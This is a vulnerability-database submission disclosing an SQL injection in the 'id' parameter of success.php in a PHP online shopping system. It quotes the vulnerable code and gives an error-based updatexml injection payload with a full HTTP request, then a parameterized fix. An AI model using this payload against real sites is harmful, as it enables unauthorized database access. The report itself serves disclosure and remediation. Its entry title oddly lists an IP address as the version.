| Title | projectworlds Free Download Online Shopping System v1.0 SQL Injection |
|---|
| Description | # SQL Injection vulnerability was discovered in Free Download Online Shopping System (success.php)
Official Website: https://projectworlds.in/free-projects/php-projects/free-download-online-shopping-system/
Version: 1.0
Related code file: /online-shopping-webvsite-in-php-master/success.php
dbname=store
Payload: /online-shopping-webvsite-in-php-master/success.php?id=1 and(select updatexml(1,concat(0x7e,(select database())),1))--+
<hr>
```php
<?php
session_start();
require 'connection.php';
if(!isset($_SESSION['email'])){
    header('location:index.php');
}else{
    // $_GET['id'] is taken as-is: no cast, escaping or parameter binding
    $user_id=$_GET['id'];
    // the raw value is concatenated straight into the UPDATE statement
    $confirm_query="update users_items set status='Confirmed' where user_id=$user_id";
    // on failure the MySQL error text is echoed to the client
    $confirm_query_result=mysqli_query($con,$confirm_query) or die(mysqli_error($con));
}
?>
```
The `id` variable is inserted directly into the SQL query without any escaping or parameterization, so an attacker could inject SQL code by manipulating the `id` parameter (line number 1-12 of ).
Injection parameter: id
```http
GET /online-shopping-webvsite-in-php-master/success.php?id=1%20and(select%20updatexml(1,concat(0x7e,(select%20database())),1))--+ HTTP/1.1
Host: 192.168.1.88
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=jv9bat9nq7anb7bgkppu8kp2oc
Connection: close
```
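For comparison, a hardened version of the same `success.php` logic, written here as an added example rather than taken from the project: the id is validated as an integer before use, the UPDATE is issued as a prepared statement with the value bound separately from the SQL text, and the database error message is logged instead of being echoed to the client (the `updatexml` payload in this report depends on that echoed error text). It assumes `connection.php` defines `$con` as a mysqli handle and the same `users_items`/`user_id` schema shown above.

```php
<?php
// Added example (not the project's code): parameterized rewrite of success.php.
// Assumes connection.php provides $con as a mysqli connection object.
session_start();
require 'connection.php';

if (!isset($_SESSION['email'])) {
    header('Location: index.php');
    exit; // stop here so nothing below runs for an unauthenticated request
}

// Validate the type first: FILTER_VALIDATE_INT rejects any value that is not a
// plain integer, so "1 and(select ...)" never reaches the query at all.
$user_id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($user_id === false || $user_id === null) {
    http_response_code(400);
    exit('invalid id');
}

// Prepared statement: the SQL text is fixed and the value travels separately,
// so user input cannot change the structure of the statement.
$stmt = $con->prepare("UPDATE users_items SET status = 'Confirmed' WHERE user_id = ?");
if ($stmt === false) {
    // Log the driver error server-side; do not return mysqli error text to the browser.
    error_log('prepare failed: ' . $con->error);
    http_response_code(500);
    exit;
}
$stmt->bind_param('i', $user_id);
if (!$stmt->execute()) {
    error_log('execute failed: ' . $stmt->error);
    http_response_code(500);
    $stmt->close();
    exit;
}
$stmt->close();
```

The example keeps the original behaviour of taking `user_id` from the query string and only changes how that value reaches the database; a request carrying the report's payload now receives a 400 from the integer check instead of a MySQL error message.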
 |
|---|
| Source | https://github.com/Sy0ung-cmd/Cve-report/blob/main/SQLi-1.md |
|---|
| User | SunYihang (UID 77239) |
|---|
| Submitted | 2024-11-09 12:41 (1 year ago) |
|---|
| Moderation | 2024-11-10 09:32 (21 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 283805 [Project Worlds Free Download Online Shopping System up to 192.168.1.88 success.php id SQL injection] |
|---|
| Points | 20 |
|---|